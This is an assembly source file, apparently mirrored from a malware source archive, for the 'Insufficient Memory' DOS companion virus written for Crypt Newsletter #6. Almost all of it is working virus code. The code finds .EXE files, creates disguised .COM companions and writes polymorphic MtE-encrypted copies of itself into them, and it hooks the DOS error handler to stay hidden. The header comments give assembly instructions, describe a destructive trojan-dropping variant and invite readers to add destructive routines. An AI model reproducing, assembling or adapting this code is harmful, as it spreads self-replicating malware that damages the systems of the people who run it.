mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-18 17:36:11 +00:00
179 lines
6.8 KiB
NASM
179 lines
6.8 KiB
NASM
;INSUFFICIENT MEMORY virus - by URNST KOUCH for Crypt Newsletter #6
|
|
;INSUFF MEMO is a simple MUTATION ENGINE loaded spawning virus, which
|
|
;confines itself to the current directory. To assemble with TASM 2.5, user
|
|
;must have complete MTE091B software package (including RND.OBJ,
|
|
;MTE.OBJ and stubfile, NOPS.BIN). Use MAKE2.BAT included in this
|
|
;issue of the Crypt Newsletter to assemble all proper
|
|
;components. Observant readers will notice INSUFF MEMO takes advantage of
|
|
;VCL 1.0 code as well as notation from the SARA virus. INSUFF MEMO is
|
|
;a non-threatening, unique example of an MtE-loaded companion virus -
|
|
;the only one in circulation, in fact.
|
|
;
|
|
;INSUFF2, included as a DEBUG script in this newsletter, is functionally
|
|
;identical to this virus. However, for those who 'require' a destructive
|
|
;program for their full enjoyment, it is loaded with a routine which
|
|
;simple checks the system time and branches to some 'dropper' code if
|
|
;after quitting time (4:00 pm). The 'dropper' reads from a data table
|
|
;and writes the NOIZ trojan to any .EXE in the current directory. By
|
|
;looking carefully at this code, several areas where 'potentially'
|
|
;destructive/nuisance routines can be added will suggest themselves.
|
|
;We do not include them for a number of reasons: 1) they are easy to
|
|
;come by in any number of books on assembly coding, the VCL 1.0 (an
|
|
;excellent source), or source code archives on mnay BBS's, and; 2)
|
|
;it allows you to get creative if you want and tinker (like I do all the
|
|
; time) with the basic layout of virus source.
|
|
;
|
|
;INSUFF3's source listing is modified to allow the virus to jump out
|
|
;of the current directory when all files in it are infected. The
|
|
;listing is publicly available at the BBS's listed at the end of the
|
|
;Crypt newsletter.
|
|
|
|
.model tiny
|
|
.radix 16
|
|
.code
|
|
|
|
extrn mut_engine: near
|
|
extrn rnd_buf: word, data_top: near
|
|
|
|
org 100
|
|
|
|
start:
|
|
call locadr
|
|
|
|
reladr:
|
|
db 'Insufficient memory'
|
|
|
|
locadr:
|
|
pop dx
|
|
mov cl,4
|
|
shr dx,cl
|
|
sub dx,10
|
|
mov cx,ds
|
|
add cx,dx ;Calculate new CS
|
|
mov dx,offset begin
|
|
push cx dx
|
|
retf
|
|
begin:
|
|
cld
|
|
mov di,offset start
|
|
push es di ;
|
|
push cs ;A carry over from the DAV
|
|
pop ds ;SARA virus, something of a curiosity
|
|
;in this companion virus
|
|
mov dx,offset dta_buf ;Set DTA
|
|
mov ah,1a
|
|
int 21
|
|
mov ax,3524 ;Hook INT 24, error handler
|
|
int 21 ;see bottom of code
|
|
push es bx
|
|
mov dx,offset fail_err
|
|
mov ax,2524
|
|
int 21
|
|
|
|
xor ax,ax ;Initialize random seed for MtE
|
|
mov [rnd_buf],ax ;could be coded, mov cs:[rnd_buf],0
|
|
push sp ;process necessary for generation of
|
|
pop cx ;MtE encryption key - see MtE docs
|
|
sub cx,sp ;for further notation
|
|
add cx,4
|
|
push cx
|
|
mov dx,offset srchnam ;EXE file-mask for spawn-name search
|
|
mov cl,3
|
|
mov ah,4e ; DOS find first file function
|
|
|
|
find_a_file:
|
|
int 021h
|
|
jc infection_done ; Exit if no files found
|
|
jmp infect ; Infect the file!
|
|
jnc infection_done ; Exit if no error
|
|
findr: mov ah,04Fh ; DOS find next file function
|
|
jmp find_a_file ; Try finding another file
|
|
|
|
|
|
infection_done:
|
|
|
|
mov ax,4C00h ;terminate
|
|
int 21h
|
|
|
|
infect:
|
|
mov ah,02Fh ; DOS get DTA address function
|
|
int 021h
|
|
mov di,bx ; DI points to the DTA
|
|
|
|
lea si,[di + 01Eh] ; SI points to file name
|
|
mov dx,si ; DX points to file name, too
|
|
mov di,offset spawn_name + 1; DI points to new name
|
|
xor ah,ah ; AH holds character count
|
|
transfer_loop:
|
|
lodsb ; Load a character
|
|
or al,al ; Is it a NULL?
|
|
je transfer_end ; If so then leave the loop
|
|
inc ah ; Add one to the character count
|
|
stosb ; Save the byte in the buffer
|
|
jmp short transfer_loop ; Repeat the loop
|
|
transfer_end:
|
|
mov byte ptr [spawn_name],ah; First byte holds char. count
|
|
mov byte ptr [di],13 ; Make CR the final character
|
|
mov di,dx ; DI points to file name
|
|
xor ch,ch ;
|
|
mov cl,ah ; CX holds length of filename
|
|
mov al,'.' ; AL holds char. to search for
|
|
repne scasb ; Search for a dot in the name
|
|
mov word ptr [di],'OC' ; Store "CO" as first two bytes
|
|
mov byte ptr [di + 2],'M' ; Store "M" to make "COM"
|
|
|
|
mov byte ptr [set_carry],0 ; Assume we'll fail
|
|
mov ax,03D00h ; DOS open file function, r/o
|
|
int 021h
|
|
jnc findr ; File already exists, so leave
|
|
mov byte ptr [set_carry],1 ; Success -- the file is OK
|
|
mov ah,03Ch ; DOS create file function
|
|
mov cx,00100111b ; CX holds file attributes (all)
|
|
int 21h
|
|
xchg bx,ax ; BX holds file handle
|
|
push dx cx
|
|
mov ax,offset data_top+0Fh
|
|
mov cl,4
|
|
shr ax,cl
|
|
mov cx,cs
|
|
add ax,cx
|
|
mov es,ax
|
|
mov dx,offset start ; DX points to start of virus
|
|
mov cx,offset _DATA ; CX holds virus length for encryption
|
|
push bp bx
|
|
mov bp,0100h ;tells MtE decryption routine will
|
|
xor si,si ;hand over control to where virus adds
|
|
xor di,di ;itself to 'infected' file, in this case offset
|
|
mov bl,0Fh ;0100h .. set si/di to 0, bl to 0Fh, all required
|
|
mov ax,101 ;set bit-field in ax
|
|
call mut_engine ;call the Mutation Engine to do its thing
|
|
pop bx ax
|
|
add ax,cx
|
|
neg ax
|
|
xor ah,ah
|
|
add ax,cx
|
|
mov ah,040h ;write encrypted virus to newly created file
|
|
int 21h
|
|
mov ah,03Eh ;close the file
|
|
int 21h
|
|
cmp byte ptr [set_carry],1
|
|
jmp infection_done ;move to end game
|
|
|
|
|
|
|
|
fail_err: ;Critical error handler
|
|
mov al,3 ;prevents virus from producing
|
|
iret ;messages on write-protected disks.
|
|
;Not handed back to machine when virus exits.
|
|
srchnam db '*.EXE',0 ;File-mask for 'spawn-search.'
|
|
|
|
|
|
|
|
.data
|
|
|
|
dta_buf db 2bh dup(?) ; Buffer for DTA
|
|
spawn_name db 12,12 dup (?),13 ; Name for next spawn
|
|
set_carry db ? ; Set-carry-on-exit flag
|
|
|
|
end start
|